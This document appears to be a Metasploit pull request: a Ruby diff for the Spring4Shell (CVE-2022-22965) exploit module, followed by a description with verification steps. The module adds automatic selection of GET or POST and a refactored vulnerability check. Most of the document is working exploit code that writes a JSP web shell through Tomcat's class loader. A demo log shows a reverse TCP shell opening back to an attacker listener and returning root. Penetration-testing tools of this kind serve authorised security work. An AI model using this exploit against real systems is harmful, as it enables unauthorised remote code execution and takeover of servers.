+    fail_with(Failure::UnexpectedReply, "Seems the payload hasn't been written") unless res.code.to_i == 200
+    print_good("#{peer} - Log file flushed at #{jsp_uri}")
+    register_files_for_cleanup(@jsp_file)
   end
 
   # Fix the JSP payload to make it valid once is dropped
@@ -238,7 +235,7 @@ class MetasploitModule < Msf::Exploit::Remote
     prefix_jsp = rand_text_alphanumeric(rand(3..5))
     date_format = rand_text_numeric(rand(1..4))
     @jsp_file = prefix_jsp + date_format + '.jsp'
-
+    
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
 
@@ -260,8 +257,6 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
     end
 
-    sleep(1)
-
     # No matter what happened, try to 'restore' the Class Loader
     properties = {
       payload: '',
@@ -270,16 +265,13 @@ class MetasploitModule < Msf::Exploit::Remote
       suffix: '',
       file_date_format: ''
     }
+
     modify_class_loader(properties)
 
-    sleep(5)
-
-    # Check if the log file exists and has been flushed
-    if check_log_file(normalize_uri(target_uri.to_s))
-      register_files_for_cleanup(@jsp_file)
-    else
-      fail_with(Failure::Unknown, "#{peer} - The log file hasn't been flushed")
-    end
+    check_log_file
+    
+    handler
+    
   end
 
 end

--- a/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
+++ b/modules/exploits/multi/http/spring_framework_rce_spring4shell.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = ManualRanking # It's going to manipulate the Class Loader
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
   include Msf::Exploit::EXE
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(8080),
         OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
-        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT'])
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
+        OptEnum.new('HTTP_METHOD', [false, 'HTTP method to use', 'Automatic', ['Automatic', 'GET', 'POST']]),
       ]
     )
     register_advanced_options [
@@ -106,18 +108,18 @@ class MetasploitModule < Msf::Exploit::Remote
     dropper
   end
 
-  def modify_class_loader(opts)
+  def modify_class_loader(method, opts)
     cl_prefix = 'class.module.classLoader'
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path.to_s),
       'version' => '1.1',
-      'method' => 'POST',
+      'method' => method,
       'headers' => {
         'c1' => '<%', # %{c1}i replacement in payload
         'c2' => '%>' # %{c2}i replacement in payload
       },
-      'vars_post' => {
+      "vars_#{method == 'GET' ? 'get' : 'post'}" => {
         "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],
         "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
         "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
@@ -193,6 +195,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    @checkcode = _check
+  end
+
+  def _check
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(Rex::Text.rand_text_alpha_lower(4..6))
@@ -213,27 +219,49 @@ class MetasploitModule < Msf::Exploit::Remote
 
     vprint_status("Detected #{server} #{version} running")
 
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI']),
-      'data' => "class.module.classLoader.DefaultAssertionStatus=#{Rex::Text.rand_text_alpha_lower(4..6)}"
-    )
+    if datastore['HTTP_METHOD'] == 'Automatic'
+      # prefer POST over get to keep the vars out of the query string if possible
+      methods = %w[POST GET]
+    else
+      methods = [ datastore['HTTP_METHOD'] ]
+    end
 
-    # setting the default assertion status to a valid status
-    send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(datastore['TARGETURI']),
-      'data' => 'class.module.classLoader.DefaultAssertionStatus=true'
-    )
-    return CheckCode::Safe unless res.code == 400
+    methods.each do |method|
+      vars = "vars_#{method == 'GET' ? 'get' : 'post'}"
+      res = send_request_cgi(
+        'method' => method,
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        vars => { 'class.module.classLoader.DefaultAssertionStatus' => Rex::Text.rand_text_alpha_lower(4..6) }
+      )
 
-    Exploit::CheckCode::Appears
+      # setting the default assertion status to a valid status
+      send_request_cgi(
+        'method' => method,
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        vars => { 'class.module.classLoader.DefaultAssertionStatus' => 'true' }
+      )
+      return Exploit::CheckCode::Appears(details: { method: method }) if res.code == 400
+    end
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
     prefix_jsp = rand_text_alphanumeric(rand(3..5))
     date_format = rand_text_numeric(rand(1..4))
     @jsp_file = prefix_jsp + date_format + '.jsp'
+    http_method = datastore['HTTP_METHOD']
+    if http_method == 'Automatic'
+      # if the check was skipped but we need to automatically identify the method, we have to run it here
+      @checkcode = check if @checkcode.nil?
+      http_method = @checkcode.details[:method]
+      fail_with(Failure::BadConfig, 'Failed to automatically identify the HTTP method') if http_method.blank?
+
+      print_good("Automatically identified HTTP method: #{http_method}")
+    end
+
+    # if the check method ran automatically, add a short delay before continuing with exploitation
+    sleep(5) if @checkcode
 
     # Prepare the JSP
     print_status("#{peer} - Generating JSP...")
@@ -251,7 +279,7 @@ class MetasploitModule < Msf::Exploit::Remote
       suffix: '.jsp',
       file_date_format: date_format
     }
-    res = modify_class_loader(properties)
+    res = modify_class_loader(http_method, properties)
     unless res
       fail_with(Failure::TimeoutExpired, "#{peer} - No answer")
     end
@@ -265,7 +293,7 @@ class MetasploitModule < Msf::Exploit::Remote
       file_date_format: ''
     }
 
-    modify_class_loader(properties)
+    modify_class_loader(http_method, properties)
 
     check_log_file
 


### PR DESCRIPTION
Exploit for CVE-2022-22965
> Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions when running on JDK 9 or above 
>            and specifically packaged as a traditional WAR and deployed in a standalone Tomcat instance are vulnerable 
>            to remote code execution due to an unsafe data binding used to populate an object from request parameters 
>            to set a Tomcat specific ClassLoader. By crafting a request to the application and referencing the 
>            org.apache.catalina.valves.AccessLogValve class through the classLoader with parameters such as the following:
>            class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp, an unauthenticated attacker can 
>            gain remote code execution.

## Verification

1. Build the application
   1. `git clone https://github.com/vleminator/Spring4Shell-POC`
   2. `docker build . -t spring4shell`
2. Run the application
   1. `docker run -p 8085:8080 spring4shell`
3. Start msfconsole
4. Run: `use exploit/multi/http/spring_framework_rce_spring4shell`
5. Set the `RHOSTS`, `TARGET`, `PAYLOAD` and payload associated datastore options
6. Run the exploit

## Demo
Spring Framework v5.3.15 on Linux (debian docker image)

```
msf6 exploit(multi/http/spring_framework_rce_spring4shell) > show options

Module options (exploit/multi/http/spring_framework_rce_spring4shell):

   Name            Current Setting       Required  Description
   ----            ---------------       --------  -----------
   FILEDROPPERDIR  /tmp/                 no        The directory used for filedropper (only applicable to non-Java target)
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          127.0.0.1             yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT           8085                  yes       The target port (TCP)
   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
   TARGETURI       /helloworld/greeting  yes       The path to the application action
   VHOST                                 no        HTTP server virtual host


Payload options (java/jsp_shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.0.174    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL                   no        The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Java


msf6 exploit(multi/http/spring_framework_rce_spring4shell) > exploit

[*] Started reverse TCP handler on 192.168.0.174:4444
[*] 127.0.0.1:8085 - Generating JSP...
[*] 127.0.0.1:8085 - Modifying Class Loader...
[*] 127.0.0.1:8085 - Waiting for the server to flush the logfile
[+] 127.0.0.1:8085 - Log file flushed at http://127.0.0.1:8085/lKNWl49.jsp
[!] Tried to delete lKNWl49.jsp, unknown result
[*] Command shell session 2 opened (192.168.0.174:4444 -> 192.168.0.174:56430 ) at 2022-04-07 14:45:06 +0200

whoami
root
```